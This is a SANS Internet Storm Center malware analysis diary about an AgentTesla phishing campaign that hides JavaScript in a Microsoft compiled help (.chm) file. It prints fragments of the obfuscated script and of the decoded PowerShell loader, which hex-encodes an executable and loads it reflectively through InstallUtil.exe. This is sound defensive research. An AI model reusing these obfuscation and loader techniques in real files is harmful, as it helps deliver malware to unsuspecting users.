AgentTesla Dropped Through Automatic Click in Microsoft Help
File
By SANS Internet Storm Center
Archived: 2026-04-05 21:47:51 UTC
Attackers have plenty of resources to infect our systems. If some files may look suspicious because the extension
is less common (like .xsl files[1]), others look really safe and make the victim confident to open it. I spotted a
phishing campaign that delivers a fake invoice. The attached file is a classic ZIP archive but it contains a .chm file:
a Microsoft compiled HTML Help file[2]. The file is named "INV00620224400.chm"
(sha256:af9fe480abc56cf1e1354eb243ec9f5bee9cac0d75df38249d1c64236132ceab) and has a current VT score
of 27/59[3].If you open this file, you will get a normal help file (.chm extension is handled by the
c:\windows\hh.exe tool).
But you will see that a Powershell window is popping up for a few seconds and disappears. Let's have a look at
the file. You can handle .chm files with 7Zip and browse their content:
https://isc.sans.edu/diary/rss/27092
Page 1 of 4

The sub-directories starting with "$" and the files starting with "#" are standard files in such files but let's have a
look at the file called "sdf48df.htm". As usual, Microsoft provides tools and file formats that are able to work with
dynamic content. This is true for help files that can embed Javascript code. Here is the content of the .htm file:
<script language="javascript">
var kldfdf='|!3C|!68|!74|!6D|!6C|!3E|!0A|!3C|!74|!69|!74|!6C|!65|!3E|!20|!43|!75|!73|!74|!6F|!6D|!65
!73|!65|!72|!76|!69|!63|!65|!20|!3C|!2F|!74|!69|!74|!6C|!65|!3E|!0A|!3C|!68|!65|!61|!64|!3E|!0A|!3C|
!61|!64|!3E|!0A|!3C|!62|!6F|!64|!79|!3E|!0A|!0A|!3C|!68|!32|!20|!61|!6C|!69|!67|!6E|!3D|!63|!65|!6E|
[...code removed...]
!72|!45|!61|!63|!68|!2D|!4F|!62|!6A|!65|!63|!74|!20|!7B|!28|!20|!5B|!43|!6F|!6E|!76|!65|!72|!74|!5D|
var fkodflg =bb0df4(kldfdf)
document.write(unescape(fkodflg));
function bb0df4(str) {
 return str.split("|!").join("%");
}
</script>
The variable kldfdf is easy to decode (it's just a hex-encoded chunk of data):
<html>
<title> Customer service </title>
<head>
https://isc.sans.edu/diary/rss/27092
Page 2 of 4

## Customer service

### Please Wait...

$e00fgfg4=(-Join ((111, 105, 130)| ForEach-Object {( [Convert]::ToInt16(([String]$_ ), 8) -As[Char])}
sal c0d4s75 $e00fgfg4
function AfdEYmOP {  
 param($GjruFEh)  
 $GjruFEh = $GjruFEh -split '(..)' | ? { $_ }  
 ForEach ($aYLEzWVc in $GjruFEh) {    
 [Convert]::ToInt32($aYLEzWVc,16)  
 }
}
[String]$vhghWAdfB='4D5A9@!@!3@!@!@!04@!@!@!FFFF@!@!B8@!@!@!@!@!@!@!4@!@!@!@!@!@!@!@!@!@!@!@!@!@!@!@
[String]$lkgY='1F8B08@!@!@!@!@!04@!CCBD07BC5C45F5387EF7EEEE6DDBDEECEEBB5BDFBB9B7E79FB125228EF2590842A
$dfffgrrr='$b05d.In@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@ke($null,$null)'.replace('@@#>@#
$jhugrdtf='$dfffgrrr.Lo@@#>@#<<<<<%%%%^^*******>>><<||||@!!!!!!!@@@@@@@@@($lqct)'.Replace('@@#>@#<<<<
$jhugrdtf| c0d4s75
[Byte[]]$lkgY2= AfdEYmOP $lkgY
[YESS]::f77df00sd('InstallUtil.exe',$lkgY2)
Xavier Mertens (@xme)
Senior ISC Handler - Freelance Cyber Security Consultant
PGP Key
Source: https://isc.sans.edu/diary/rss/27092
https://isc.sans.edu/diary/rss/27092
Page 4 of 4